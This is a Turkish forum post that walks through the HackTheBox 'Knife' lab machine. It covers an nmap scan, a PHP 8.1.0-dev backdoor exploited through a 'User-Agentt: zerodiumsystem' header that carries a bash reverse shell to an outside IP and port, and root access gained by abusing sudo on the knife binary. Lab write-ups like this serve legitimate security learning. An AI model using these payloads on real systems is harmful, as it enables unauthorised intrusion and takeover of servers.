HackTheBox Knife Writeup

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18
Furkan Öztürk tarafından yazılmıştır.

[TR] – HackTheBox Knife Writeup​




Selam arkadaşlar bu yazıda size HackTheBox‘da bulunan Knife makinasının çözümünü anlatacağım.

Her zamanki gibi NMAP ile başlıyoruz. nmap çıktımızdan 22 ve 80 portlarının açık olduğunu anladık.

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-12 17:54 +03
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.43 seconds



Siteye attığımız HTTP request’inin response’unda normalden farklı olarak

X-Powered-By: PHP/8 .1.0-dev

HTTP başlığının olduğunu gördük.

req1-300x62.jpg


user.txt​


Bu header hakkında internette ufak bir araştırma sonucu User-Agent request header’ı ile sistemde komut çalıştırabileceğimizi anladım.

Aşağıdaki header’ı kullanarak başarıyla shell aldım.

User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.16.23/1337 0>&1'")

/home/james

dizinin altından user.txt’yi aldım.



Privilege Escalation​


sudo -l

ile root olarak çalıştırabileceğimiz komutlara bakıyoruz.

sudol-300x53.png


GTFOBins‘de knife diye arama yaptığımız zaman

sudo knife exec -E 'exec "/bin/sh"'

komutu ile root olabileceğimizi anlıyoruz.

root-300x51.png


root dizininde bulunan root.txt‘yi okuyup makinayı bitiriyoruz.



Bu makinenin çözümü bu kadardı, umarım anlaşılır olmuştur. Yeni bir makine çözümünde görüşmek üzere!
 
Moderatör tarafında düzenlendi:
Geri
Üst